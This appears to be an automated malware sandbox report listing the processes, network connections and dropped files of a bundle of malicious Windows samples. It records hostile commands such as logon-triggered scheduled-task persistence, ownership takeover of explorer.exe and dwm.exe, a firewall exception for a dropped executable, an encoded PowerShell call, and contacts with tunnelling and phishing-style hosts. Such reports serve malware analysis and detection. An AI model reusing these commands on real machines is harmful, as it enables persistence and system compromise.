"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f
C:\Windows\SysWOW64\reg.exe
reg import Fonts.reg /reg:32
C:\Windows\SysWOW64\reg.exe
reg import Cursors.reg /reg:32
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winaerotweakerhelper.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im winaerotweaker.exe /f
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=212238&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNC0xMS0wOFQwOToxOToxOC41NTVaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:406532 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe
scary.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exe
the.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dll
wimloader.dll
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_fb327d75-e738-4d0c-bcde-5d4cf1554e73\caller.cmd" "
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\vPDJkNgZb2qQ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -EncodedCommand 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
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe
ac3.exe
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\shell1.ps1"
C:\Windows\SysWOW64\PING.EXE
ping trustsentry.com -t -n 1 -s 4 -4
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\DS2lJjxX5bYw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\PING.EXE
ping ya.ru -t -n 1 -s 4 -4
C:\Windows\SysWOW64\PING.EXE
ping tria.ge -t -n 1 -s 4 -4
C:\Windows\SysWOW64\xcopy.exe
xcopy bloatware C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy beastify.url C:\Users\Admin\Desktop
C:\Windows\SysWOW64\xcopy.exe
xcopy shell1.ps1 C:\Users\Admin\Desktop
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{C5BD4162-E564-4F77-B365-36BD5383442A} {309B46C4-58D8-4921-9D7C-3B790364B964} 1952
C:\Windows\SysWOW64\cmd.exe
cmd /c install.bat
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "DroidCamFilter32.ax"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "DroidCamFilter64.ax"
C:\Windows\system32\regsvr32.exe
/s "DroidCamFilter64.ax"
C:\Program Files (x86)\DroidCam\lib\insdrv.exe
"C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{512bbd22-4f1b-194d-e1f1-cd06e8f26378}\droidcam.inf" "9" "6e67c8bbf" "00000000000005DC" "WinSta0\Default" "00000000000005D4" "208" "c:\program files (x86)\droidcam\lib"
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Windows\system32\pnpui.dll,InstallSecurityPromptRunDllW 20 Global\{540e316d-1e11-02b0-5321-292876b9ca2d} Global\{6eb0db00-4d67-6993-166d-7d1fdab5c452} C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.inf C:\Windows\System32\DriverStore\Temp\{4864994d-257c-46c0-0e86-0017f15e0819}\droidcam.cat
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Kzc7NpqR3EAQ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem2.inf" "droidcam.inf:MicrosoftDS.NTAMD64:DroidCam_PCMEX:1.0.0.1:droidcam" "6e67c8bbf" "00000000000005DC" "00000000000005FC" "00000000000005F8"
C:\Windows\SysWOW64\takeown.exe
takeown /R /F C:\Windows\explorer.exe
C:\Windows\SysWOW64\icacls.exe
icacls c:\Windows\explorer.exe /grant Admin:(F)
C:\Windows\SysWOW64\takeown.exe
takeown /R /F C:\Windows\System32\dwm.exe
C:\Windows\SysWOW64\icacls.exe
icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
C:\Windows\SysWOW64\xcopy.exe
xcopy xcer.cer C:\Users\Admin\Desktop
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xMpCKpeM4s9U.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\exkVVvci5sM8.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SotQmsnK8LSD.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe
freebobux.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe
SolaraBootstraper.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im ctfmon.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\freebobux.bat""
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll
wim.dll
C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\CLWCP.exe
clwcp c:\temp\bg.bmp
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\load.cmd" "
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\cringe.mp4"
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\lol.ini
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\mailgooglecom.json
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_75044109-eb7c-4c16-885c-f601bfbd929b\CLOCK.py
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:734221 /prefetch:2
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\xcer.cer
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\zIF5T2gxy810.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6CB7.tmp\x.vbs"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\QmdQV8raYufy.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe
f3cb220f1aaa32ca310586e5f62dcab1.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 15
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2272 CREDAT:3748878 /prefetch:2
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ORLHVJxSJiqt.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\SysWOW64\xcopy.exe
xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\regedit.exe
regedit
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jD0d0HUugteK.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x584
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EZyhRilaxK4P.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Program Files\SubDir\Romilyaa.exe
"C:\Program Files\SubDir\Romilyaa.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TtFOjjU5RTQ3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | https-login--microsoftonline--com.httpsproxy.net | udp |
| GB | 142.250.200.19:80 | https-login--microsoftonline--com.httpsproxy.net | tcp |
| US | 8.8.8.8:53 | aadcdn.msftauth.net | udp |
| US | 152.199.21.175:443 | aadcdn.msftauth.net | tcp |
| US | 8.8.8.8:53 | mrbeast.codes | udp |
| US | 8.8.8.8:53 | dwrapper-prod.herokuapp.com | udp |
| IE | 54.73.53.134:80 | dwrapper-prod.herokuapp.com | tcp |
| US | 8.8.8.8:53 | exampledd.matomo.cloud | udp |
| DE | 18.157.122.248:80 | exampledd.matomo.cloud | tcp |
| US | 8.8.8.8:53 | a2957.q.akamai.net | udp |
| GB | 2.23.210.92:443 | a2957.q.akamai.net | tcp |
| FR | 5.157.51.190:53 | | udp |
| ES | 185.93.182.46:53 | | tcp |
| RS | 152.89.160.205:983 | | tcp |
| ES | 212.227.33.35:22 | | tcp |
| BG | 185.216.32.42:443 | | tcp |
| US | 74.208.156.127:53 | | tcp |
| DE | 217.160.104.214:22 | | tcp |
| PL | 5.157.22.182:22 | | tcp |
| JP | 172.105.221.253:53 | | tcp |
| FR | 57.128.125.147:80 | 57.128.125.147 | tcp |
| US | 8.8.8.8:53 | ipfounder.net | udp |
| US | 8.8.8.8:53 | jozzu420-51305.portmap.host | udp |
| N/A | 127.0.0.1:50984 | | tcp |
| US | 8.8.8.8:53 | trustsentry.com | udp |
| US | 8.8.8.8:53 | ya.ru | udp |
| US | 8.8.8.8:53 | tria.ge | udp |
| US | 8.8.8.8:53 | having-jackson.gl.at.ply.gg | udp |
| US | 147.185.221.18:56522 | having-jackson.gl.at.ply.gg | tcp |
Files
memory/2072-0-0x000000007403E000-0x000000007403F000-memory.dmp
memory/2072-1-0x0000000001210000-0x000000000126E000-memory.dmp
memory/2072-2-0x0000000000550000-0x0000000000574000-memory.dmp
memory/2072-3-0x0000000074030000-0x000000007471E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\!main.cmd
| MD5 | 5bef4958caf537ac924b6ce01e1d1e13 |
| SHA1 | cf7a0805a98f3c16ca14c6e420e2ca44ad77a164 |
| SHA256 | e801541a9d48a9adbb720cdb5b06f9bab9b4a62f0434221876a607a7be75d28d |
| SHA512 | 9f62246e56f3461f8d180d3a4bc3ccd6187f457196b770af9c8427a3795504f6b44d2fb7a305d41d54d58e4759136426ca4f6e09771136f27d2c478aad153f99 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.pack
| MD5 | 34a66c4ec94dbdc4f84b4e6768aebf4e |
| SHA1 | d6f58b372433ad5e49a20c85466f9fb3627abff2 |
| SHA256 | fcf530e33a354ac1de143e2f87960e85f694e99d7aa652408c146e8d0a1430fb |
| SHA512 | 4db51769dcee999baf3048c793dde9ad86c76f09fc17edd8e2f1dedf91cf224ddfbe9554c4ff14659ea0f6663b054953ec2ab9d964e6e9ca44ee744e02b7e5b9 |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\spread.cmd
| MD5 | 7a71a7e1d8c6edf926a0437e49ae4319 |
| SHA1 | d9b7a4f0ed4c52c9fbe8e3970140b47f4be0b5f1 |
| SHA256 | e0d127c00f9679fb359c04b6238b976f1541918a0df0d6c61f1a44e8f27846ae |
| SHA512 | 96a57412bda3f16e56398cd146ece11e3d42291dceff2aec22871a7e35e3b102b27151984ae0795ca6d5ef5385ef780906d9b13cec78cbbdf019a3de4792ca3a |
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\doxx.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.didata
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.edata
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.idata
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\0.txt
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\.txt
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\CERTIFICATE.cer
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\data.txt
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\i.txt
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\1\_.txt
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\2\CODE2000.TTF
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\2\readme.txt
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1344.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1598.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1599.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1689.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1741.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_1870.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_5068.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_5049.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\export\3\IMG_5343.MP4
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\61b13e8da79fd7d9f190f23f96c189db.dll
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\beastify.url
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ac3.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bg.png
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\cipher.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\ed64c9c085e9276769820a981139e3c2a7950845.dll
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\freebobux.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\handler.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\phishing.url
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Macro_blank.png
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\lupa.png
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\jkka.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\jaffa.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\install.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\helper.vbs
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\punishment.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\punishment.vbs
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\readme.md
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Read Me.txt
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\regmess.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\screenshot.png
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\selfaware.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\2.hta
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\xcer.cer
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wimloader.dll
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\wim.dll
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web3.htm
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web2.htm
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\web.htm
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\the.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\stopwerfault.cmd
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\spinner.gif
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\SolaraBootstraper.exe
C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\shell1.ps1
C:\Users\Admin\AppData\Local\Temp\Cab4BC2.tmp
C:\Users\Admin\AppData\Local\Temp\Tar4BC5.tmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1801A0BFF52C676E5F51CA71C5350277
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\favicon_a_eupayfgghqiai7k9sol6lg2[1].ico
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\78076te\imagestore.dat
C:\Users\Admin\AppData\Local\Temp\regmess_239e6675-cf83-4482-a135-4b30a903012e\regmess.bat
C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe
C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod
C:\Users\Admin\AppData\Local\Psiphon3\psicash\psicashdatastore.prod.2.commit
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 72c7c8c07101b27fa3fd40a5d8ac513e |
| SHA1 | d373b24220c13fee50f08d1062950230718327af |
| SHA256 | a285995a999416ded29bff78c6cd6398fe7f57dc95e763713314aa59b8f5b2cb |
| SHA512 | c15f71832bf7c6ba0121f67bc0e45e71f94ad44d9a31837d258c378b5e32460a716d5a8cc64d305ffba30e7d367952ecba1f3625c4093450a6f2ae2444c5e272 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5f915f9dbaaccd1bf78e2b5cc1e0d82d |
| SHA1 | 109e5895e3747531b3de5a577c369ca38f1a5ef7 |
| SHA256 | 4d85df9a28738ec7e18002a8e4057cb2b1bb16934cb4de1d44900c3874914cb8 |
| SHA512 | 1411cbb174332326e2d2d7878b0f39e69231d86a55584f8160f509f1000a228ff9056b49518f62147ac97753e76fd2ea6e644f780be9ce85c4b0abe0ef3f9bed |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 37d06293bec42e5e5c944f1233ad806c |
